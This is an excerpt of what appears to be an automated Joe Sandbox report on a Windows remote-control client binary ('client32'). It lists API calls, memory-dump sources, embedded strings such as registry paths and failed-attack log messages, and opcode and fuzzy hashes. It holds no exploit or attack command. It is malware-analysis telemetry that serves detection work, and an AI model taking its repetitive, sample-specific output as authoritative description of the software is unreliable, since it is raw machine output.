                                                                                        • GetTickCount.KERNEL32(?,0000004A,?,?,?,00000000), ref: 110EB64E
                                                                                        • SendMessageTimeoutA.USER32(?,0000004A,?,?,00000000,?,?), ref: 110EB696
                                                                                        • OpenEventA.KERNEL32(00000002,00000000,runplugin.dmp.1,?,00000000), ref: 110EB6C8
                                                                                        • SetEvent.KERNEL32(00000000,?,00000000), ref: 110EB6D5
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 110EB6DC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountEventMessageSendTick$CloseHandleOpenTimeout__wcstoi64wsprintf
                                                                                        • String ID: %s$DATA$Error. Runplugin is unresponsive$INIT$TracePlugins$Warning: SendMessage to Runplugin took %d ms (possibly unresponsive)$_debug$runplugin %s (hWnd=%x,u=%d,64=%d) $runplugin.dmp.1
                                                                                        • API String ID: 3451743168-2289091950
                                                                                        • Opcode ID: c1241e5542d040f8c34fd841d2e563697d9392d2fed16766f0bb09ef5b5a5159
                                                                                        • Instruction ID: 06eeb675c9fb82aaee3c5e1b90d71b9ae50c85907530b7dc4e87486fa2a47647
                                                                                        • Opcode Fuzzy Hash: c1241e5542d040f8c34fd841d2e563697d9392d2fed16766f0bb09ef5b5a5159
                                                                                        • Instruction Fuzzy Hash: A141E775A012199FD724CFA5DC84FAEF7B8EF48304F1085AAE91AA7640D631AD40CFB1
                                                                                        APIs
                                                                                        • EnterCriticalSection.KERNEL32(HJN,?,00000000,00000000,?,110CB60A,1105E75F,?,00000000,?,110BE929,00000000,00000000,?,1105E75F,?), ref: 110CB45E
                                                                                        • RegisterClipboardFormatA.USER32(WM_ATLGETHOST), ref: 110CB46F
                                                                                        • RegisterClipboardFormatA.USER32(WM_ATLGETCONTROL), ref: 110CB47B
                                                                                        • GetClassInfoExA.USER32(11000000,AtlAxWin100,?), ref: 110CB4A0
                                                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 110CB4D1
                                                                                        • RegisterClassExA.USER32 ref: 110CB4F2
                                                                                        • _memset.LIBCMT ref: 110CB51B
                                                                                        • GetClassInfoExA.USER32(11000000,AtlAxWinLic100,?), ref: 110CB536
                                                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 110CB56B
                                                                                        • RegisterClassExA.USER32 ref: 110CB58C
                                                                                        • LeaveCriticalSection.KERNEL32(HJN,0000000E), ref: 110CB5B5
                                                                                        • LeaveCriticalSection.KERNEL32(HJN,?,?,?,?,110CB60A,1105E75F,?,00000000,?,110BE929,00000000,00000000,?,1105E75F,?), ref: 110CB5CB
                                                                                          • Part of subcall function 110C2C00: __recalloc.LIBCMT ref: 110C2C48
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ClassRegister$CriticalSection$ClipboardCursorFormatInfoLeaveLoad$Enter__recalloc_memset
                                                                                        • String ID: AtlAxWin100$AtlAxWinLic100$HJN$WM_ATLGETCONTROL$WM_ATLGETHOST
                                                                                        • API String ID: 2220097787-3027925682
                                                                                        • Opcode ID: 8be8c82d578b7ce9cf9cc495cb365543be575607f387d856cefed87b35aa24b4
                                                                                        • Instruction ID: 380367346e18165f725bae6bc82d4f79de56b371e9301c8febdab5dbf058e0d0
                                                                                        • Opcode Fuzzy Hash: 8be8c82d578b7ce9cf9cc495cb365543be575607f387d856cefed87b35aa24b4
                                                                                        • Instruction Fuzzy Hash: 854179B5D02229ABCB01DFD9E984AEEFFB9FB48714F50406AE415B3200DB351A44CFA4
                                                                                        APIs
                                                                                          • Part of subcall function 11088C40: IsWindow.USER32(?), ref: 11088C5F
                                                                                          • Part of subcall function 11088C40: IsWindow.USER32(?), ref: 11088C6D
                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 11071BAB
                                                                                          • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                          • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                          • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 11071C1A
                                                                                        • _memset.LIBCMT ref: 11071C62
                                                                                        • GetTickCount.KERNEL32(?,?,00000002), ref: 11071C73
                                                                                        • GetTickCount.KERNEL32(?,?,00000002), ref: 11071C7C
                                                                                        • GetTickCount.KERNEL32(?,?,00000002), ref: 11071C95
                                                                                        • Sleep.KERNEL32(?,?,?,00000002), ref: 11071CD8
                                                                                        • Sleep.KERNEL32(0000000A,?,?,00000002), ref: 11071D2D
                                                                                        • GetTickCount.KERNEL32(?,?,?,?,?,00000002), ref: 11071E78
                                                                                          • Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,774E42C0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$Window$Sleep_memset$CloseCreateEnableEventHandle_mallocwsprintf
                                                                                        • String ID: $gfff
                                                                                        • API String ID: 891474222-257315895
                                                                                        • Opcode ID: 44063090aa28f62224d78ecb02e939bf8d8117b27dce2b65f00e15d810b8b071
                                                                                        • Instruction ID: 513feb5f7381e08072cb6c26fa2f18ad4f0fb6e6a3d9412ac9f35556057935f0
                                                                                        • Opcode Fuzzy Hash: 44063090aa28f62224d78ecb02e939bf8d8117b27dce2b65f00e15d810b8b071
                                                                                        • Instruction Fuzzy Hash: 11C1BD74B003159FEB24DF64CD81BAAB7B6FF88704F1085A8E556AB3C0DB74A941CB45
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,0000044D), ref: 110398CC
                                                                                        • IsWindowVisible.USER32(00000000), ref: 110398CF
                                                                                        • GetDlgItem.USER32(?,0000044F), ref: 110398F8
                                                                                        • IsWindowVisible.USER32(00000000), ref: 110398FB
                                                                                        • GetDlgItem.USER32(?,000004BE), ref: 11039928
                                                                                        • IsWindowVisible.USER32(00000000), ref: 1103992B
                                                                                        • GetDlgItem.USER32(?,000017EC), ref: 11039958
                                                                                        • IsWindowVisible.USER32(00000000), ref: 1103995B
                                                                                        • GetDlgItem.USER32(?,0000048D), ref: 11039988
                                                                                        • IsWindowVisible.USER32(00000000), ref: 1103998B
                                                                                        • GetDlgItem.USER32(?,0000048E), ref: 110399B8
                                                                                        • IsWindowVisible.USER32(00000000), ref: 110399BB
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        • GetDlgItem.USER32(00000000,00000001), ref: 11039A02
                                                                                        • EnableWindow.USER32(00000000,00000001), ref: 11039A06
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ItemWindow$Visible$EnableErrorExitLastMessageProcesswsprintf
                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                        • API String ID: 2531669725-1986719024
                                                                                        • Opcode ID: d168139fabaf00070f6a95217ffc7b6ddd9d783989ebd31efb4cdcea38c75ad5
                                                                                        • Instruction ID: c605c523e88007737b9d27236d90d9a53477605ae0cc304b47ea9e042cf8b0eb
                                                                                        • Opcode Fuzzy Hash: d168139fabaf00070f6a95217ffc7b6ddd9d783989ebd31efb4cdcea38c75ad5
                                                                                        • Instruction Fuzzy Hash: EA4195757407056FF624DAA9CD81F1AB7DAABC8B40F208518F769DB3C0EEB0E8408758
                                                                                        APIs
                                                                                          • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                          • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                          • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                          • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                          • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                        • GetDlgItem.USER32(00000000,00000001), ref: 1103944A
                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 1103944F
                                                                                        • _calloc.LIBCMT ref: 1103945C
                                                                                        • GetSystemMenu.USER32 ref: 11039490
                                                                                        • EnableMenuItem.USER32 ref: 1103949E
                                                                                        • GetDlgItem.USER32(00000000,0000044E), ref: 110394BC
                                                                                        • SetWindowPos.USER32(00000000,00000001,00000000,00000000,00000000,00000000,00000043), ref: 11039509
                                                                                        • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043), ref: 11039538
                                                                                        • UpdateWindow.USER32 ref: 11039567
                                                                                        • BringWindowToTop.USER32(?), ref: 1103956E
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                          • Part of subcall function 1115FFC0: SetForegroundWindow.USER32(?), ref: 1115FFEE
                                                                                        • MessageBeep.USER32(000000FF,00000001), ref: 1103957F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Window$Item$EnableMenuMessage$BeepBringErrorExitForegroundLastObjectProcessRectShowSystemTextUpdate_callocwsprintf
                                                                                        • String ID: CLTCONN.CPP$e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd$m_nc
                                                                                        • API String ID: 4191401721-1182766118
                                                                                        • Opcode ID: 51b6937d982a358fdf259d5baecad387e1d1d56d4f23d55ad49fb18189202900
                                                                                        • Instruction ID: fea8d420f6ab3010a63bc2930e21c2de0d8b75aa48f279369a9769ea0f724755
                                                                                        • Opcode Fuzzy Hash: 51b6937d982a358fdf259d5baecad387e1d1d56d4f23d55ad49fb18189202900
                                                                                        • Instruction Fuzzy Hash: 0C411AB9B803157BE7209761DC87F9AF398AB84B1CF104434F3267B6C0EAB5B4408759
                                                                                        APIs
                                                                                        • GetSysColor.USER32(00000004), ref: 11003691
                                                                                          • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 111430F4
                                                                                          • Part of subcall function 111430E0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 11143109
                                                                                          • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 11143111
                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 110036A5
                                                                                        • GetStockObject.GDI32(00000007), ref: 110036B0
                                                                                        • SelectObject.GDI32(?,00000000), ref: 110036BB
                                                                                        • SelectObject.GDI32(?,?), ref: 110036CC
                                                                                        • GetSysColor.USER32(00000010), ref: 110036DC
                                                                                        • GetSysColor.USER32(00000010), ref: 110036F3
                                                                                        • GetSysColor.USER32(00000014), ref: 1100370A
                                                                                        • GetSysColor.USER32(00000014), ref: 11003721
                                                                                        • GetSysColor.USER32(00000014), ref: 1100373E
                                                                                        • GetSysColor.USER32(00000014), ref: 11003755
                                                                                        • GetSysColor.USER32(00000010), ref: 1100376C
                                                                                        • GetSysColor.USER32(00000010), ref: 11003783
                                                                                        • InflateRect.USER32 ref: 110037A0
                                                                                        • Rectangle.GDI32(?,?,00000001,?,?), ref: 110037BA
                                                                                        • SelectObject.GDI32(?,?), ref: 110037CE
                                                                                        • SelectObject.GDI32(?,?), ref: 110037D8
                                                                                        • DeleteObject.GDI32(?), ref: 110037DE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Color$Object$Select$BrushCreateDeleteInflateRectRectangleSolidStockText
                                                                                        • String ID:
                                                                                        • API String ID: 3698065672-0
                                                                                        • Opcode ID: b833179956e3f332fb7c6e9edd2a8bf0286dfddfec6fc6f9ae6a9a20b302d007
                                                                                        • Instruction ID: a23acd2a2556d2351ec77cf4709ac6c6322e0be3c302c098e9beaf4924cedc1a
                                                                                        • Opcode Fuzzy Hash: b833179956e3f332fb7c6e9edd2a8bf0286dfddfec6fc6f9ae6a9a20b302d007
                                                                                        • Instruction Fuzzy Hash: 78515EB5900309AFE714DFA5CC85EBBF3BDEF98704F104A18E611A7691D670B944CBA1
                                                                                        APIs
                                                                                        • GetLocalTime.KERNEL32(?,FailedAttacks,00000001,FailedAttacks,00000000,80000002,Software\Productive Computer Insight\Client32,0002001F,00000000,00000000,?,?,?,B24479DC,?,?), ref: 1104B8F6
                                                                                        • _sprintf.LIBCMT ref: 1104B923
                                                                                          • Part of subcall function 110ED9F0: RegSetValueExA.ADVAPI32(00000002,?,00000000,?,00000001,00000003), ref: 110EDA19
                                                                                        • _strncpy.LIBCMT ref: 1104BACE
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorExitLastLocalMessageProcessTimeValue_sprintf_strncpywsprintf
                                                                                        • String ID: @ %s$%04d/%02d/%02d %02d:%02d:%02d$%s, %d$*** Warning. Failed Attack %u, from %s, at %s$FailedAttacks$Info. Connection Rejected, reason=%d$IsA()$LastAttack$LastAttacker$NC-$Software\Productive Computer Insight\Client32$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                        • API String ID: 3341947355-3231647555
                                                                                        • Opcode ID: bf24cdc0d1c8f437c1f78f848f572163a498503435f86e354c973d25993fb003
                                                                                        • Instruction ID: fe029f2b4bd5101e4da145cc81d4ac0798fef8b5c75ba173e470820e68b704ff
                                                                                        • Opcode Fuzzy Hash: bf24cdc0d1c8f437c1f78f848f572163a498503435f86e354c973d25993fb003
                                                                                        • Instruction Fuzzy Hash: 34916075E00219AFEB10CFA9CC84FEEFBB4EF45704F148199E549A7281EB716A44CB61
                                                                                        APIs
                                                                                        • _calloc.LIBCMT ref: 1104702F
                                                                                        • wsprintfA.USER32 ref: 110470AE
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        • wsprintfA.USER32 ref: 110470E9
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,00000014,00000080), ref: 11047203
                                                                                        • _strrchr.LIBCMT ref: 1104720C
                                                                                        • GetWindowsDirectoryA.KERNEL32(00000016,00000080), ref: 11047235
                                                                                        • _free.LIBCMT ref: 11047251
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf$DirectoryErrorExitFileLastMessageModuleNameProcessWindows_calloc_free_strrchr
                                                                                        • String ID: %s %s$CLTCONN.CPP$NSA %s$NSS$V1.10$V12.00$V12.10$V12.10F20
                                                                                        • API String ID: 1757445300-1785190265
                                                                                        • Opcode ID: 8df59efd58386d5d632d4f9a1d1019fa2f1450115bc2f61edf1bae4acd3b0bfd
                                                                                        • Instruction ID: 26d4bceacdf9fffedd66530a5670ce95754bb6fc5caa385817b5218b2f2053ae
                                                                                        • Opcode Fuzzy Hash: 8df59efd58386d5d632d4f9a1d1019fa2f1450115bc2f61edf1bae4acd3b0bfd
                                                                                        • Instruction Fuzzy Hash: 3F619A78E00657ABD714CFB48CC1B6FF7E99F40308F1048A8ED5697641EA62F904C3A2
                                                                                        APIs
                                                                                          • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                        • _malloc.LIBCMT ref: 1100B496
                                                                                          • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                          • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                          • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                          • Part of subcall function 1100AD10: EnterCriticalSection.KERNEL32(000000FF,B24479DC,?,00000000,00000000), ref: 1100AD54
                                                                                          • Part of subcall function 1100AD10: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100AD72
